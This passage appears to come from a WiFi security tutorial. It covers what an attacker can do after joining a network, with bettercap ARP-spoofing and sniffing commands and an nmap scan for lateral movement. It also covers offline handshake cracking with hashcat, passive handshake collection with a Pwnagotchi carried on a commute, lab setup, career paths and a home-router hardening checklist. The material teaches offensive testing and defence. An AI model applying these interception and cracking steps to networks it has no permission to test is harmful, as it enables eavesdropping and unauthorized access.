Evil Twin (duplicate SSID)	By signal characteristics	Nzyme can detect, most home setups can’t
Rogue AP	MAC/signal mismatch	Requires dedicated monitoring
PMKID capture	Passive — no detectable traffic	Invisible
CSRF/DNS rebinding	Not a wireless attack	Not a wireless attack

A 2025 Nozomi Networks report found 94% of wireless networks worldwide lack adequate protection against deauth attacks. WPA3 with PMF (Protected Management Frames) blocks standard deauth — but Mathy Vanhoef’s research group found bypasses even with PMF enabled.

Every WiFi guide ends at “password cracked.” But the beginner’s real question is: “then what?” What does being on someone’s network actually let you see and do?

The HTTPS Reality Check

Here’s the honest truth: HTTPS killed the classic sniffer. In 2025, virtually all websites use encrypted connections (HTTPS). If you ARP-spoof someone’s connection (trick their computer into sending all traffic through yours), here’s what you CAN and CAN’T see:

The post-compromise tools (for your own lab network):

# Bettercap — the Swiss Army knife for network attacks
# ARP spoof + network sniff (see all DNS queries on the network)
sudo bettercap

# Inside bettercap's interactive shell:
net.probe on          # Discover all devices
arp.spoof on          # Redirect traffic through you
net.sniff on          # Watch the traffic flow

Lateral Movement — Where Real Damage Happens

The real power of being on someone’s network isn’t sniffing encrypted traffic — it’s reaching devices that were never meant to be internet-accessible:

# Scan the entire local network for running services
nmap -sV --allports 192.168.1.0/24

What typically shows up:

Trick: The APT28 “Nearest Neighbor” attack proved this at nation-state scale. Russian intelligence compromised a nearby business’s WiFi, pivoted to dual-homed devices, and used PowerShell living-off-the-land techniques to reach the actual target. WiFi → lateral movement → full network compromise. The WiFi password was just the door. The house is what mattered.

Most WiFi security tools are Linux-native. Here’s the honest breakdown for Windows users.

The practical Windows workflow:

Capture on Linux (Kali USB boot) → copy .hc22000 file to Windows → Crack on Windows (hashcat with gaming GPU)

Capture requires Linux because Windows doesn’t support monitor mode on consumer adapters. But cracking is pure GPU math — hashcat runs identically on Windows. So capture where the radio tools work, crack where your expensive GPU lives.

Trick: If you have a gaming PC with an RTX card, that IS your cracking rig. Hashcat on Windows is literally the same speed as Linux. Install it from hashcat.net, download the RockYou wordlist, and you’re ready. Capture on Kali, crack on Windows.

The honest ceiling is severe. Phone WiFi chips don’t expose monitor mode. No airodump-ng, no handshake capture, no deauth, no packet injection — regardless of root status or custom ROMs.

Capability	Non-Rooted	Rooted	Rooted + NetHunter Full
WiFi scanning (channels, signal, encryption)	WiFiAnalyzer	Same	Same
Network device scanning	Fing	Same	Same
Monitor mode (internal WiFi)			Only Samsung Galaxy S10 with custom kernel confirmed
Monitor mode (external USB adapter via OTG)			With compatible adapter
WPS PIN testing	Limited (Android 9+ blocked direct WPS API)	WIFI WPS WPA TESTER	Full
Run Kali tools			Full Linux environment
Crack WPA passwords		Painfully slow — phone CPUs aren’t GPUs	Same

Kali NetHunter has 3 editions — only one does WiFi attacks:

• Rootless (any Android, Termux): Kali userspace, but NO WiFi attack capability
• Lite (rooted): Adds HID attacks, still no WiFi injection
• Full (rooted + device-specific custom kernel): The ONLY edition with WiFi attacks — and even then, you usually need an external USB adapter via OTG cable

For phone-only users (students with no laptop): The minimum viable WiFi testing setup is a $10 USB OTG cable + a compatible cheap adapter (TP-Link TL-WN722N v1, ~$15) + Kali NetHunter Full on a supported rooted device. Total: ~$25 on top of your phone. An ESP8266 board ($3-5) serves as a practice target.

Trick: Realistic answer — use your phone for reconnaissance (WiFi scanning, network mapping with Fing, WiGLE wardriving). Use a laptop for actual attacks. Phones lack the hardware and driver support for serious WiFi testing. If you have $40 and a laptop, a Kali USB stick + Alfa adapter gets you further than any phone setup ever will.

Every attack above requires sitting down, running commands, and waiting. But there’s a passive approach — devices that run unsupervised and silently collect WiFi handshakes from every network they encounter.

Pwnagotchi — AI-Driven Handshake Collector

Pwnagotchi is a Raspberry Pi-based device with a cute e-ink face that uses AI to optimize handshake collection. It learns which networks to target and when, getting better over time in familiar environments. Carries in your bag, runs on a battery, collects handshakes passively.

Hardware: Raspberry Pi Zero 2W, 2.13" e-ink display (Waveshare V4), 16GB+ MicroSD, 5V/2A power bank. ~$50 total.

2025 reality check: The most active fork (jayofelony, 2.6K stars) removed the AI entirely — the branch is literally called “noai.” The AI component was destabilizing the WiFi firmware. Alternative forks like aluminum-ice/scifijunkie (v1.9.0) retain the AI if you want it.

Handshakes get stored as PCAP files in /root/handshakes/ — compatible with hashcat for offline cracking. Plugins enable WiGLE uploads, GPS logging, and cooperative multi-Pwnagotchi operation.

ESP32 Marauder Wardrive Mode

Marauder’s wardrive mode + GPS module logs every WiFi network encountered with GPS coordinates, encryption type, and signal strength — exportable to WiGLE or KML (Google Earth). The new Apex 5 ($99, Feb 2026) adds dual-band 2.4+5GHz scanning. The VoyagerRF v2 board adds 3dBi antenna, MicroSD, GPS, and NRF24/CC1101 socket — a complete RF Swiss Army knife for Flipper Zero.

WiGLE’s database now exceeds 150 million WiFi networks worldwide. Research found opportunistic wardrive collection captures at least 60% of total WiFi APs in any given area.

Trick: Pwnagotchi in a backpack during your daily commute passively collects handshakes from every WiFi network it encounters. Over a week, you build a collection of crackable handshakes without ever running a single command. Ethical use: test if your own network’s password would resist this kind of passive collection.

Every attack in this guide can be practiced legally on equipment you own. Here’s the complete setup from zero hardware to advanced enterprise scenarios.

Physical Lab (~$60-80 total):

Configure the spare router with different security modes:

Use bare-metal Kali, not a VM. USB passthrough for WiFi adapters in VirtualBox/VMware breaks timing-sensitive captures. Install Kali on a USB stick for dual-boot convenience.

Isolate your lab: Run the spare router with NO internet connection. Reduce TX power to minimum. Interior room for RF isolation. For proper shielding, a Faraday cage (~$200-500, or DIY with copper mesh).

Zero-Hardware Virtual Lab (Free)

WiFiChallengeLab (GitHub r4ulcl/WiFiChallengeLab-docker, GPL-3.0) uses a Linux kernel module called mac80211_hwsim to create fully virtualized WiFi networks in Docker — no physical WiFi hardware needed at all. Challenges cover OPN, WEP, WPA2-PSK, WPA3-SAE, WPA3-OWE, and WPA2-Enterprise. Includes Nzyme WIDS for detection practice. CTFd challenge platform at lab.wifichallenge.com.

OSWP exam takers consistently recommend it as the best free practice environment.

Advanced virtual scenarios beyond the pre-built challenges: mac80211_hwsim creates arbitrary virtual WiFi interfaces (modprobe mac80211_hwsim radios=5 = 5 virtual adapters). Build custom WPA2-Enterprise labs with FreeRADIUS, test 802.1X certificate auth, multi-AP roaming — all in software. freerad-lab on GitHub provides a Docker-based WPA2-Enterprise lab with EAP-TLS support.

Practice Progression (30-Day Path):

Trick: Your first session goal: capture a handshake from your own router (set to a known weak password) and crack it with aircrack-ng. This takes 5-30 minutes once setup works. That first “holy shit it actually works” moment is what hooks you. Everything after is just expanding the toolkit.

Everything in this guide maps to real career paths paying $75,000-$200,000+/year.

Certifications

Most OSWP reviewers pass within 90 minutes of practical time. WiFiChallengeLab is the universally recommended free practice environment.

Salary Ranges (2025-2026)

The career ladder: Junior Pentester (OSCP) → add OSWP specialization → IoT Penetration Tester → Senior IoT Security Engineer → Security Architect / Principal Researcher.

Bug Bounty Programs Accepting Router/IoT Submissions

Industries hiring wireless security: Healthcare (medical device security), automotive (connected vehicles), telecom, defense (Lockheed Martin, Raytheon, MIT Lincoln Lab), consulting (Rapid7, NCC Group, SpecterOps).

At DEF CON 33, researchers found 10+ vulnerabilities from hacking public transit bus WiFi → vehicular router → bus private network → ADAS/APTS vehicle control systems. Backdoors in cybersecurity-certified vehicular routers compromised all global units of that model.

Trick: “Wireless penetration tester” isn’t a standalone job title on most boards. Search for “penetration tester” + filter by OSWP requirement — Indeed returns 30+ positions. WiFi pentesting is a SPECIALIZATION within general pentesting, not a separate career. Get OSCP first (broad employability), add OSWP second (niche expertise that commands premium rates for wireless assessments).

These steps take 10 minutes total and block the majority of attacks described above. Do them now.

Step 1 — Change default admin credentials. Go to your router’s admin panel (usually 192.168.1.1), change both username and password. Blocks CSRF, default credential exploitation, brute-force.

Step 2 — Disable UPnP. Advanced settings → UPnP → OFF. Blocks silent firewall port opening.

Step 3 — Disable remote management and TR-069. Unless your ISP requires them, turn both off. Blocks 41 million exposed routers’ worth of attack surface.

Step 4 — Update firmware. Check manufacturer’s website. No updates for 2+ years? Your router may be end-of-life — replace it.

Step 5 — Use WPA3-only mode. If all devices support WPA3, switch from “WPA2/WPA3” to “WPA3 only.” Blocks transition mode downgrade.

Step 6 — Change default router IP. 192.168.1.1 → 192.168.73.1 or similar. Breaks automated CSRF and DNS rebinding.

Step 7 — Rename SSID. Don’t use your name or apartment number. Generic name defeats WiGLE reconnaissance.

Step 8 — Delete old saved WiFi networks. Phone settings → Saved Networks → delete unused ones. Shrinks your probe request fingerprint.

Step 9 — Log out of router admin. Close the browser tab. Prevents CSRF that depends on active session.

Step 10 — Set a calendar reminder. Check firmware every 3 months. Router security isn’t a one-time thing.

Risk Level	Your Situation	Action
Critical	Router 5+ years old, no updates available	Replace the hardware — $50-80
Critical	Default admin password (admin/admin)	Change it right now — 30 seconds
High	UPnP enabled, remote management on	Disable both — 2 minutes
High	WPA2/WPA3 transitional mode	Switch to WPA3-only if possible
Moderate	SSID with your name/apartment number	Rename — 1 minute
Moderate	Never checked firmware version	Check and update — 5 minutes